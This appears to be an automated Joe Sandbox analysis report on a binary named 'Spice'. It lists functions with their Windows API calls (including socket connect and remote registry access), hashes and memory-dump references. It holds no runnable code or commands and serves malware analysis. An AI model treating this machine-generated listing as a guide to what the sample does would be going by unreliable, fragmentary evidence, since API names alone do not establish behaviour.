Instruction Fuzzy Hash: E9314F706042589FDB21DF18DC84F6537E2FB89728F1821A4F6149F2B1CBB2AC40EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00ECE287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ECE2CA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ECE2F0
SysAllocString.OLEAUT32(00000000), ref: 00ECE2F3
SysAllocString.OLEAUT32(?), ref: 00ECE311
SysFreeString.OLEAUT32(?), ref: 00ECE31A
StringFromGUID2.OLE32(?,?,00000028), ref: 00ECE33F
SysAllocString.OLEAUT32(?), ref: 00ECE34D

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 83d46731bc9444363052bb392c6afe9c4d7aebb214141b5dd01f4a60cbda5ef8
Instruction ID: 3c2bc287ebc70ec508b01fe05fc9e5246d7567f9b2c33b531f94ad5717615a72
Opcode Fuzzy Hash: 83d46731bc9444363052bb392c6afe9c4d7aebb214141b5dd01f4a60cbda5ef8
Instruction Fuzzy Hash: 9D21A83560020DAFDF10DFA8CC48EBB77ACFB08364B044129F914EB250DA71AC429764

Uniqueness

Uniqueness Score: -1.00%

Function 00EE685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00EE84A0

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00EE68B1
WSAGetLastError.WSOCK32(00000000), ref: 00EE68C0
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00EE68F9
connect.WSOCK32(00000000,?,00000010), ref: 00EE6902
WSAGetLastError.WSOCK32 ref: 00EE690C
closesocket.WSOCK32(00000000), ref: 00EE6935
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00EE694E

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 5e8c34ec569346c6b4f58cc37fe3d49dee18a88b572bc3428eee76c9c2d1fdb4
Instruction ID: c6f4869503bdcec6cc1b84f9a78d52112db0dd05943a0e19cf9a84ae98333473
Opcode Fuzzy Hash: 5e8c34ec569346c6b4f58cc37fe3d49dee18a88b572bc3428eee76c9c2d1fdb4
Instruction Fuzzy Hash: 8031AD7160020CAFDB10AF65CC85FBA77E9EB54764F048029F949BB2D1CB75AC049BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00ECE360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ECE3A5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00ECE3CB
SysAllocString.OLEAUT32(00000000), ref: 00ECE3CE
SysAllocString.OLEAUT32 ref: 00ECE3EF
SysFreeString.OLEAUT32 ref: 00ECE3F8
StringFromGUID2.OLE32(?,?,00000028), ref: 00ECE412
SysAllocString.OLEAUT32(?), ref: 00ECE420

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: ed62820e7697dacb90f3f4662cab31f15aa1482e12eafd1534fef2b30158eefd
Instruction ID: 7372f6e628869a729f9cc8181e26cd0693f2c0c22bbad66280a9c28af5847f7f
Opcode Fuzzy Hash: ed62820e7697dacb90f3f4662cab31f15aa1482e12eafd1534fef2b30158eefd
Instruction Fuzzy Hash: 16218835604209AFDB24DFA8DD88EAE77ECFB08364B008129F915DB360DA75EC429764

Uniqueness

Uniqueness Score: -1.00%

Function 00EF7BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E72111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E7214F
Part of subcall function 00E72111: GetStockObject.GDI32(00000011), ref: 00E72163
Part of subcall function 00E72111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E7216D

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EF7C57
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EF7C64
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EF7C6F
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EF7C7E
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EF7C8A

Strings

Msctls_Progress32, xrefs: 00EF7C28

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 827081d7c777940a786cc0eac992273166f5a3572c0443af34a3ef866e568d81
Instruction ID: 3a2ff41a1d3fc330542f42020ec6b75765a8b61d77db95d8d7afc67fc02e8fa4
Opcode Fuzzy Hash: 827081d7c777940a786cc0eac992273166f5a3572c0443af34a3ef866e568d81
Instruction Fuzzy Hash: 881186B115021DBEEF159F60CC85EE7BF6DEF08758F015115BB48A6050DB729C21DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00E99D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00E99D16

Part of subcall function 00E933B7: EncodePointer.KERNEL32(00000000), ref: 00E933BA
Part of subcall function 00E933B7: __initp_misc_winsig.LIBCMT ref: 00E933D5
Part of subcall function 00E933B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00E9A0D0
Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00E9A0E4
Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00E9A0F7
Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00E9A10A
Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00E9A11D
Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00E9A130
Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00E9A143
Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00E9A156
Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00E9A169
Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00E9A17C
Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00E9A18F
Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00E9A1A2
Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00E9A1B5
Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00E9A1C8
Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00E9A1DB
Part of subcall function 00E933B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00E9A1EE

__mtinitlocks.LIBCMT ref: 00E99D1B
__mtterm.LIBCMT ref: 00E99D24

Part of subcall function 00E99D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00E99D29,00E97EFD,00F2CD38,00000014), ref: 00E99E86
Part of subcall function 00E99D8C: _free.LIBCMT ref: 00E99E8D
Part of subcall function 00E99D8C: DeleteCriticalSection.KERNEL32(00F30C00,?,?,00E99D29,00E97EFD,00F2CD38,00000014), ref: 00E99EAF

__calloc_crt.LIBCMT ref: 00E99D49
__initptd.LIBCMT ref: 00E99D6B
GetCurrentThreadId.KERNEL32 ref: 00E99D72

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 9cfc52cfb652641e61a9f8a899834bd8c8155d09ec0f6d1c51cc32b1a3417932
Instruction ID: 19125d751984e16a4b62977ed519f87feef6f1bb42c2c1f8adb3afeee7d0152a
Opcode Fuzzy Hash: 9cfc52cfb652641e61a9f8a899834bd8c8155d09ec0f6d1c51cc32b1a3417932
Instruction Fuzzy Hash: D3F09032A4A7156AEF347B7D7C4369A76D4DF81734F21261EF4A4F51D3EF11884141A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E941B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E94282,?), ref: 00E941D3
GetProcAddress.KERNEL32(00000000), ref: 00E941DA
EncodePointer.KERNEL32(00000000), ref: 00E941E6
DecodePointer.KERNEL32(00000001,00E94282,?), ref: 00E94203

Strings

combase.dll, xrefs: 00E941CE
RoInitialize, xrefs: 00E941C2

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: be1fdce9474d8bca61556ad002e5e8624fc849e23f392a14e7f5eb9201befa1d
Instruction ID: ff8b88f8647e416bdba75b5f59706aeb54a1281cb2ae8d3aedf1ec80863a8247
Opcode Fuzzy Hash: be1fdce9474d8bca61556ad002e5e8624fc849e23f392a14e7f5eb9201befa1d
Instruction Fuzzy Hash: 3DE01A70691749AFEF102B71ED4DB293AAAB755B1AF604424B401E50F0CFB54085BF10

Uniqueness

Uniqueness Score: -1.00%

Function 00E9428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E941A8), ref: 00E942A8
GetProcAddress.KERNEL32(00000000), ref: 00E942AF
EncodePointer.KERNEL32(00000000), ref: 00E942BA
DecodePointer.KERNEL32(00E941A8), ref: 00E942D5

Strings

combase.dll, xrefs: 00E942A3
RoUninitialize, xrefs: 00E94297

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 308fac71dcf38b12f7aefb7105080ae4e1be594c71671b627efe6467766a587d
Instruction ID: 8767f272a06d0d1513f40e76d1dd2a856fc622e643985f57b875a35047336476
Opcode Fuzzy Hash: 308fac71dcf38b12f7aefb7105080ae4e1be594c71671b627efe6467766a587d
Instruction Fuzzy Hash: 4DE0B6B0551718EBEB11AB60AD0DF453AA9B744B16F504115F001E52F0CFB48504FA11

Uniqueness

Uniqueness Score: -1.00%

Function 00E7218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00E721B8
GetWindowRect.USER32(?,?), ref: 00E721F9
ScreenToClient.USER32(?,?), ref: 00E72221
GetClientRect.USER32(?,?), ref: 00E72350
GetWindowRect.USER32(?,?), ref: 00E72369

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 7f60b7e36471a571b27a86a0cbdedc9e94882f2c84092a1fdee902e278c4fe41
Instruction ID: 3e8876b05fd9576a0cab517780efde1796774ad9eca4753c37a1e7ccec460b76
Opcode Fuzzy Hash: 7f60b7e36471a571b27a86a0cbdedc9e94882f2c84092a1fdee902e278c4fe41
Instruction Fuzzy Hash: 1CB15E3990024AEBDF10CFA8C9807EDB7B1FF08714F14E129EE59AB255DB34AA50DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00ED6A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00ED6BC6
_memmove.LIBCMT ref: 00ED6B01

Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC

_memmove.LIBCMT ref: 00ED6B74
_memmove.LIBCMT ref: 00ED6C5B
_memmove.LIBCMT ref: 00ED6C74
_memmove.LIBCMT ref: 00ED6C90

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: d64454222c26cb8bf762489de01ddacca6189937e32c11841e75ba2062f97503
Instruction ID: 78086dc2bb4f0f703a3bad11f22a8d7c950d9b2c10204e7dced00cd3805fa145
Opcode Fuzzy Hash: d64454222c26cb8bf762489de01ddacca6189937e32c11841e75ba2062f97503
Instruction Fuzzy Hash: 9761AD7150025AABCF11EF60CC81EFE77A8EF05308F04A55AF9997B292DB359D06CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00EF0844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77

Part of subcall function 00EF147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EF040D,?,?), ref: 00EF1491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EF091D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EF095D
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00EF0980
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EF09A9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EF09EC
RegCloseKey.ADVAPI32(00000000), ref: 00EF09F9

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 304ac84560c1f213d4657c546cd507c46d2ed671b3156a7a6233d4fcba957198
Instruction ID: 6ceefb724f8a537255b46f66015e0bae732871ac19950bb5667b90b323483468
Opcode Fuzzy Hash: 304ac84560c1f213d4657c546cd507c46d2ed671b3156a7a6233d4fcba957198
Instruction Fuzzy Hash: A5519A31208208AFD714EF24C885E6FBBE8FF84314F04591DF599A72A2EB71E905CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00EF5DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00EF5E38
GetMenuItemCount.USER32(00000000), ref: 00EF5E6F
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00EF5E97
GetMenuItemID.USER32(?,?), ref: 00EF5F06
GetSubMenu.USER32(?,?), ref: 00EF5F14
PostMessageW.USER32(?,00000111,?,00000000), ref: 00EF5F65

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: f6b10d11f5590fbeea59679ddccedd9e09b6d13b8607bca9a403a848a13682b5
Instruction ID: e19862d851ab5648c679ab974f02a0037035d82af322a756d2bcb84cc0052007
Opcode Fuzzy Hash: f6b10d11f5590fbeea59679ddccedd9e09b6d13b8607bca9a403a848a13682b5
Instruction Fuzzy Hash: A7518F76A01619EFCF11EF64C845ABEB7F5EF58310F105099EA15BB391CB31AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 00ECF688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00ECF6A2
VariantClear.OLEAUT32(00000013), ref: 00ECF714
VariantClear.OLEAUT32(00000000), ref: 00ECF76F
_memmove.LIBCMT ref: 00ECF799
VariantClear.OLEAUT32(?), ref: 00ECF7E6
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00ECF814

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: f1e1270aa378d25ed03750a88cfd1ab0f578f20d8271db45341a1c9f961b412a
Instruction ID: e73b5c725b485c27be8f3656bbe45a8d32ddee13f4a569904e37d5c451b9dce2
Opcode Fuzzy Hash: f1e1270aa378d25ed03750a88cfd1ab0f578f20d8271db45341a1c9f961b412a
Instruction Fuzzy Hash: A6514BB5A00209EFCB14CF58C894EAAB7B9FF4C314B15856AE959EB301D731E911CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00ED29B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00ED29FF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ED2A4A
IsMenu.USER32(00000000), ref: 00ED2A6A
CreatePopupMenu.USER32 ref: 00ED2A9E
GetMenuItemCount.USER32(000000FF), ref: 00ED2AFC
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00ED2B2D

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 92a792e5affe4fa4776bc31069cacd38fcbef72afc43e401ea4e25c8f74421e4
Instruction ID: a545b8aae95be0f97917b6f385da03aaf20afdd58a9b26c29beea8a522fc3a8f
Opcode Fuzzy Hash: 92a792e5affe4fa4776bc31069cacd38fcbef72afc43e401ea4e25c8f74421e4
Instruction Fuzzy Hash: 70518D70A002099FCF25CF68C888BAEBBF4EF64318F14515FE911AB391D7B09946CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00E71B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00E729E2: GetWindowLongW.USER32(?,000000EB), ref: 00E729F3

BeginPaint.USER32(?,?,?,?,?,?), ref: 00E71B76
GetWindowRect.USER32(?,?), ref: 00E71BDA
ScreenToClient.USER32(?,?), ref: 00E71BF7
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E71C08
EndPaint.USER32(?,?), ref: 00E71C52

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_e70000_Spice.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 6e0b4790b44177afdda96d31c71623141bb7989f6097ad97c5666eef01a1b618
Instruction ID: fbc761cecc57ed16cc6289f87c68aa815ebaf16e1d4fb1678db81117e9078c71
Opcode Fuzzy Hash: 6e0b4790b44177afdda96d31c71623141bb7989f6097ad97c5666eef01a1b618
Instruction Fuzzy Hash: DA41D7701043049FD721DF68CC88FBA7BE9FB49374F144569F999972A1C7319805EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00EFBD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00F377B0,00000000,013B5878,?,?,00F377B0,?,00EFBC1A,?,?), ref: 00EFBD84
EnableWindow.USER32(00000000,00000000), ref: 00EFBDA8
ShowWindow.USER32(00F377B0,00000000,013B5878,?,?,00F377B0,?,00EFBC1A,?,?), ref: 00EFBE08
ShowWindow.USER32(00000000,00000004,?,00EFBC1A,?,?), ref: 00EFBE1A
EnableWindow.USER32(00000000,00000001), ref: 00EFBE3E
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00EFBE61

Memory Dump Source

Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true

